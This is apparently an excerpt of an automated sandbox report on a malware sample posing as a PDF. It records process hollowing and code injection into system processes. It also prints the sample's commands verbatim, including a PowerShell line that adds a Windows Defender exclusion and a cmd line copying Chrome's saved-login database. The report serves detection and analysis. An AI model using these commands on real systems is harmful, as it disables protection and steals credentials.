Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D090 mov eax, dword ptr fs:[00000030h]	6_2_0598D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D090 mov eax, dword ptr fs:[00000030h]	6_2_0598D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595D08D mov eax, dword ptr fs:[00000030h]	6_2_0595D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A260B8 mov eax, dword ptr fs:[00000030h]	6_2_05A260B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A260B8 mov ecx, dword ptr fs:[00000030h]	6_2_05A260B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596208A mov eax, dword ptr fs:[00000030h]	6_2_0596208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059ED080 mov eax, dword ptr fs:[00000030h]	6_2_059ED080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059ED080 mov eax, dword ptr fs:[00000030h]	6_2_059ED080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F80A8 mov eax, dword ptr fs:[00000030h]	6_2_059F80A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E20DE mov eax, dword ptr fs:[00000030h]	6_2_059E20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059890DB mov eax, dword ptr fs:[00000030h]	6_2_059890DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD0C0 mov eax, dword ptr fs:[00000030h]	6_2_059DD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD0C0 mov eax, dword ptr fs:[00000030h]	6_2_059DD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595C0F0 mov eax, dword ptr fs:[00000030h]	6_2_0595C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A20F0 mov ecx, dword ptr fs:[00000030h]	6_2_059A20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A0E3 mov ecx, dword ptr fs:[00000030h]	6_2_0595A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A350D9 mov eax, dword ptr fs:[00000030h]	6_2_05A350D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059850E4 mov eax, dword ptr fs:[00000030h]	6_2_059850E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059850E4 mov ecx, dword ptr fs:[00000030h]	6_2_059850E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E60E0 mov eax, dword ptr fs:[00000030h]	6_2_059E60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059680E9 mov eax, dword ptr fs:[00000030h]	6_2_059680E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h]	6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h]	6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h]	6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h]	6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h]	6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h]	6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h]	6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h]	6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E4000 mov ecx, dword ptr fs:[00000030h]	6_2_059E4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F6030 mov eax, dword ptr fs:[00000030h]	6_2_059F6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A020 mov eax, dword ptr fs:[00000030h]	6_2_0595A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595C020 mov eax, dword ptr fs:[00000030h]	6_2_0595C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A35060 mov eax, dword ptr fs:[00000030h]	6_2_05A35060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05962050 mov eax, dword ptr fs:[00000030h]	6_2_05962050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598B052 mov eax, dword ptr fs:[00000030h]	6_2_0598B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6050 mov eax, dword ptr fs:[00000030h]	6_2_059E6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov ecx, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 9_2_00DE39FE FormatMessageW,ConvertLengthToIpv4Mask,InetNtopW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,LocalFree,LocalAlloc,GetAdaptersAddresses,LocalFree,

9_2_00DE39FE

Enables debug privileges

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7854F20 RtlAddVectoredExceptionHandler,RaiseFailFastException,	0_2_00007FF7D7854F20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D78BBE8C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7D78BBE8C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00DE53F0 SetUnhandledExceptionFilter,	9_2_00DE53F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00DE51A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00DE51A0

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Windows\System32\calc.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\calc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\cmd.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread register set: target process: 4004
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Thread register set: target process: 4004
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Thread register set: target process: 4004

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section unmapped: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base address: 400000	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: DE0000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\System32\calc.exe base address: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\System32\cmd.exe base address: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\System32\svchost.exe base address: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Program Files (x86)\Internet Explorer\iexplore.exe base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Section unmapped: C:\Windows\System32\conhost.exe base address: C90000
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base address: 400000
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base address: 400000
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 240000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E7C008	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\calc.exe base: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\calc.exe base: 401000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\cmd.exe base: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\cmd.exe base: 401000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\svchost.exe base: 401000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 401000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 300A008	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 401000
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 2F07008

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 9_2_00DE4ACA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

9_2_00DE4ACA

Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2130140124.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2127441350.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000003.3076417197.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3074909396.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: GetLocaleInfoEx,	0_2_00007FF7D78EC890
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: GetLocaleInfoEx,	0_2_00007FF7D78EB900
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: GetLocaleInfoEx,	0_2_00007FF7D78EC960

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
